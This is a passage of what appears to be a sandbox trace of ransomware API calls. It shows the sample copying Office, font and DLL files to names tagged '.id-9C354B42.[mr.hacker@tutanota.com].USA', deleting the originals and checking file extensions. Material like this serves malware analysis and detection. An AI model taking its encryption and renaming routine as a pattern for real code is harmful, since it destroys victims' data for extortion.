(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.400] GetLastError () returned 0x0 [0274.400] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x72, lpOverlapped=0x0) returned 1 [0274.401] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0274.401] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.401] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf8, lpOverlapped=0x0) returned 1 [0274.402] SetEndOfFile (hFile=0x3c0) returned 1 [0274.402] CloseHandle (hObject=0x3c0) returned 1 [0274.402] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.402] SetEndOfFile (hFile=0x2ac) returned 1 [0274.404] CloseHandle (hObject=0x2ac) returned 1 [0274.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 1 [0274.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.404] lstrlenW (lpString=".doc") returned 4 [0274.404] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.404] lstrlenW (lpString=".docx") returned 5 [0274.404] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.404] lstrlenW (lpString=".pdf") returned 4 [0274.404] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.404] lstrlenW (lpString=".xls") returned 4 [0274.404] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.404] lstrlenW (lpString=".xlsx") returned 5 [0274.404] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.404] lstrlenW (lpString=".ppt") returned 4 [0274.404] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.404] lstrlenW (lpString=".zip") returned 4 [0274.404] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString=".rar") returned 4 [0274.405] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString=".bz2") returned 4 [0274.405] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.405] lstrlenW (lpString=".7z") returned 3 [0274.405] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString=".dbf") returned 4 [0274.405] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString=".1cd") returned 4 [0274.405] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString=".jpg") returned 4 [0274.405] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString=".doc") returned 4 [0274.405] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.405] lstrlenW (lpString=".docx") returned 5 [0274.405] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.405] lstrlenW (lpString=".pdf") returned 4 [0274.405] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString=".xls") returned 4 [0274.405] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString=".xlsx") returned 5 [0274.405] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.405] lstrlenW (lpString=".ppt") returned 4 [0274.405] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.405] lstrlenW (lpString=".zip") returned 4 [0274.405] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.406] lstrlenW (lpString=".rar") returned 4 [0274.406] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.406] lstrlenW (lpString=".bz2") returned 4 [0274.406] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.406] lstrlenW (lpString=".7z") returned 3 [0274.406] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.406] lstrlenW (lpString=".dbf") returned 4 [0274.406] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.406] lstrlenW (lpString=".1cd") returned 4 [0274.406] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0274.406] lstrlenW (lpString=".jpg") returned 4 [0274.406] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.406] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.406] lstrlenW (lpString="INFOPATH_K_COL.HXK") returned 18 [0274.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.406] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=113) returned 1 [0274.406] CloseHandle (hObject=0x2ac) returned 1 [0274.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 0x20 [0274.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.407] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.407] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.407] GetLastError () returned 0x0 [0274.407] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x71, lpOverlapped=0x0) returned 1 [0274.408] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0274.409] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.409] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf8, lpOverlapped=0x0) returned 1 [0274.409] SetEndOfFile (hFile=0x3c0) returned 1 [0274.409] CloseHandle (hObject=0x3c0) returned 1 [0274.409] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.409] SetEndOfFile (hFile=0x2ac) returned 1 [0274.412] CloseHandle (hObject=0x2ac) returned 1 [0274.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 1 [0274.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0274.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0274.413] lstrlenW (lpString=".doc") returned 4 [0274.413] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.413] lstrlenW (lpString=".docx") returned 5 [0274.413] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.413] lstrlenW (lpString=".pdf") returned 4 [0274.413] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.413] lstrlenW (lpString=".xls") returned 4 [0274.413] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.413] lstrlenW (lpString=".xlsx") returned 5 [0274.413] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.413] lstrlenW (lpString=".ppt") returned 4 [0274.413] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0274.413] lstrlenW (lpString=".zip") returned 4 [0274.413] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.413] lstrlenW (lpString=".rar") returned 4 [0274.413] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.413] lstrlenW (lpString=".bz2") returned 4 [0274.413] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 Thread: id = 63 os_tid = 0x694 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3540088 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3550090 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35c0 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b3808 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35d8 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3df0020 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35f0 [0263.681] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b35f0, Size=0x20) returned 0x607a80 [0263.681] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35f0 [0263.681] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b35f0, Size=0x20) returned 0x607af8 [0263.682] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.682] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.682] Wow64DisableWow64FsRedirection (in: OldValue=0x380ff58 | out: OldValue=0x380ff58*=0x0) returned 1 [0263.682] lstrlenW (lpString="kernel32.dll") returned 12 [0263.682] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607a80 | out: hHeap=0x520000) returned 1 [0263.682] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.682] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607af8 | out: hHeap=0x520000) returned 1 [0263.682] Sleep (dwMilliseconds=0x64) [0263.977] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0263.977] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0263.977] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.020] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=1984228) returned 1 [0264.020] CloseHandle (hObject=0x344) returned 1 [0264.020] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0264.085] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.085] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.085] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.085] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.085] lstrlenW (lpString=".doc") returned 4 [0264.085] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString=".docx") returned 5 [0264.085] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.085] lstrlenW (lpString=".pdf") returned 4 [0264.085] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString=".xls") returned 4 [0264.085] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.085] lstrlenW (lpString=".xlsx") returned 5 [0264.085] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.085] lstrlenW (lpString=".ppt") returned 4 [0264.085] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.085] lstrlenW (lpString=".zip") returned 4 [0264.085] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.085] lstrlenW (lpString=".rar") returned 4 [0264.085] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString=".bz2") returned 4 [0264.085] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString=".7z") returned 3 [0264.085] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.085] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.085] lstrlenW (lpString=".dbf") returned 4 [0264.085] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.085] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString=".1cd") returned 4 [0264.086] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString=".jpg") returned 4 [0264.086] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString=".doc") returned 4 [0264.086] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString=".docx") returned 5 [0264.086] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.086] lstrlenW (lpString=".pdf") returned 4 [0264.086] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString=".xls") returned 4 [0264.086] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.086] lstrlenW (lpString=".xlsx") returned 5 [0264.086] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.086] lstrlenW (lpString=".ppt") returned 4 [0264.086] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString=".zip") returned 4 [0264.086] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.086] lstrlenW (lpString=".rar") returned 4 [0264.086] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString=".bz2") returned 4 [0264.086] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.086] lstrlenW (lpString=".7z") returned 3 [0264.086] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.086] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.086] lstrlenW (lpString=".dbf") returned 4 [0264.086] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.087] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.087] lstrlenW (lpString=".1cd") returned 4 [0264.087] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.087] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0264.087] lstrlenW (lpString=".jpg") returned 4 [0264.087] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.087] Sleep (dwMilliseconds=0x64) [0264.279] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0264.279] lstrlenW (lpString="IpsPlugin.dll") returned 13 [0264.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0264.612] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=94720) returned 1 [0264.612] CloseHandle (hObject=0x348) returned 1 [0264.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll")) returned 0x20 [0264.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.612] lstrlenW (lpString=".doc") returned 4 [0264.613] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString=".docx") returned 5 [0264.613] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0264.613] lstrlenW (lpString=".pdf") returned 4 [0264.613] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString=".xls") returned 4 [0264.613] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString=".xlsx") returned 5 [0264.613] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0264.613] lstrlenW (lpString=".ppt") returned 4 [0264.613] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.613] lstrlenW (lpString=".zip") returned 4 [0264.613] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString=".rar") returned 4 [0264.613] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0264.613] lstrlenW (lpString=".bz2") returned 4 [0264.613] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0264.613] lstrlenW (lpString=".7z") returned 3 [0264.613] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0264.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.613] lstrlenW (lpString=".dbf") returned 4 [0264.613] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0264.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.613] lstrlenW (lpString=".1cd") returned 4 [0264.613] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0264.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.614] lstrlenW (lpString=".jpg") returned 4 [0264.614] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.614] lstrlenW (lpString=".doc") returned 4 [0264.614] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString=".docx") returned 5 [0264.614] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0264.614] lstrlenW (lpString=".pdf") returned 4 [0264.614] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString=".xls") returned 4 [0264.614] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString=".xlsx") returned 5 [0264.614] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0264.614] lstrlenW (lpString=".ppt") returned 4 [0264.614] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.614] lstrlenW (lpString=".zip") returned 4 [0264.614] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString=".rar") returned 4 [0264.614] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0264.614] lstrlenW (lpString=".bz2") returned 4 [0264.614] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0264.614] lstrlenW (lpString=".7z") returned 3 [0264.614] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0264.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.614] lstrlenW (lpString=".dbf") returned 4 [0264.614] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0264.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.615] lstrlenW (lpString=".1cd") returned 4 [0264.615] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0264.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 64 [0264.615] lstrlenW (lpString=".jpg") returned 4 [0264.615] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0264.615] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0264.615] lstrlenW (lpString="PRJRES.DLL") returned 10 [0264.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0264.912] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=3943312) returned 1 [0264.912] CloseHandle (hObject=0x37c) returned 1 [0264.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll")) returned 0x20 [0264.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft 